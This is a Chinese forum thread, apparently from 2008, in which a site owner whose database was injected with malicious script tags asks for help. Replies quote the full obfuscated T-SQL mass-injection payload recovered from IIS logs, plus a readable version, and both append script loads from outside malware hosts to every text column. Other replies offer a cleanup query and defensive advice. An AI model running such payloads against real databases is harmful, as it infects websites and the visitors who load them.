问题描述
郁闷网站被黑,所有文字字段被加入</title></</title></pre>"><scriptsrc=http://1.hao929.cn/ads.js></script><!--大家有没有人,遇到过,怎么解决,关键是堵住漏洞不知道他是怎么办到的,怕以后又被黑网上查了不少地方,中这个的还不少,不过都没说是怎么被黑的,怎么堵漏洞在此先谢过大家
解决方案
解决方案二:
察看日志没有具体的环境不好帮你找
解决方案三:
iis的日志,我看了下,没有找到关于</title></</title></pre>"><scriptsrc=http://1.hao929.cn/ads.js></script><!--的关键字的记录,其他的注入语句到不少,但都没成功,不指导最近有没有这方面的黑客工具,会做到这些
解决方案四:
该回复于2008-05-08 14:44:36被版主删除
解决方案五:
感觉应该是SQL注入攻击
解决方案六:
不知道怎么上传文件,我想把IIs日志发上来,给大家看看,下午再说,先吃饭
解决方案七:
找到一段;dEcLaRe@tvArChAr(255),@cvArChAr(255)dEcLaRetAbLe_cursoRcUrSoRFoRsElEcTa.nAmE,b.nAmEFrOmsYsObJeCtSa,sYsCoLuMnSbwHeRea.iD=b.iDAnDa.xTyPe='u'AnD(b.xTyPe=99oRb.xTyPe=35oRb.xTyPe=231oRb.xTyPe=167)oPeNtAbLe_cursoRfEtChnextFrOmtAbLe_cursoRiNtO@t,@cwhile(@@fEtCh_status=0)bEgInexec('UpDaTe['+@t+']sEt['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x3C2F7469746C653E3C2F7072653E3E3C736372697074207372633D687474703A2F2F73622E353235322E77733A38382F3130372F312E6A733E3C2F7363726970743E3C212D2DaSvArChAr(67))')fEtChnextFrOmtAbLe_cursoRiNtO@t,@ceNdcLoSetAbLe_cursoRdEAlLoCaTetAbLe_cursoR;--
解决方案八:
学编程还的把反编程也就是骇客攻击连接下!最近也看了比较多
解决方案九:
找到一篇文章最近我的网站常被人挂马,我不知道为什么,我去掉了一段时间论坛,后来就没中了,仔细一分析,发现原来是数据库常被人挂马了.以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99ntextxtype=35textxtype=231nvarcharxtype=167varchar———————YD的分割——————————–DECLARE@Tvarchar(255),@Cvarchar(255)DECLARETable_CursorCURSORFORSelecta.name,b.namefromsysobjectsa,syscolumnsbwherea.id=b.idanda.xtype=’u’and(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)OPENTable_CursorFETCHNEXTFROMTable_CursorINTO@T,@CWHILE(@@FETCH_STATUS=0)BEGINexec(’update[’+@T+’]set[’+@C+’]=rtrim(convert(varchar,[’+@C+’]))+”挂马内容”’)FETCHNEXTFROMTable_CursorINTO@T,@CENDCLOSETable_CursorDEALLOCATETable_Cursor
解决方案十:
注入了!
解决方案十一:
select'update'+b.[name]+'set'+a.[name]+'=replace('+a.[name]+',''</title></pre>"><scriptsrc=http://1.hao929.cn/ads.js></script><!--'','''')'fromsyscolumnsasa,sysobjectsasbwherea.[id]=b.[id]andb.xtype='U'anda.xtypein('231','35','99','167','175')orderbyb.[name]
解决方案十二:
那他们是利用那个权限或者怎么注入的呢?如何防范呢?
解决方案十三:
关注,怎么冲根本解决呢,10楼的别人换个地址就不行啦,暂时性的!
解决方案十四:
哈哈,被人挂马了。注意网站在提交参数的时候一定要过滤好字符串
解决方案十五:
怎么才能防止?高人请教啊~!
解决方案:
SQL注入
解决方案:
一般的字符过滤好象没什么用的!有解决到问题的没有?
解决方案:
什么SQL注入...明明就是跨站攻击....................................................................楼主记得传参用sqlparameter还要过滤掉危险字符..象<script>之类的,想都不想就过滤了...或者给他替换成全角的.
解决方案:
怕怕。最近老是有人在说自己网站被黑。看来我新学做的几个非常烂的网站。都没SQL过滤。要好好抽时间去过滤下。唉,一直都明白这是很大漏洞都懒去改。看来真的是不行了。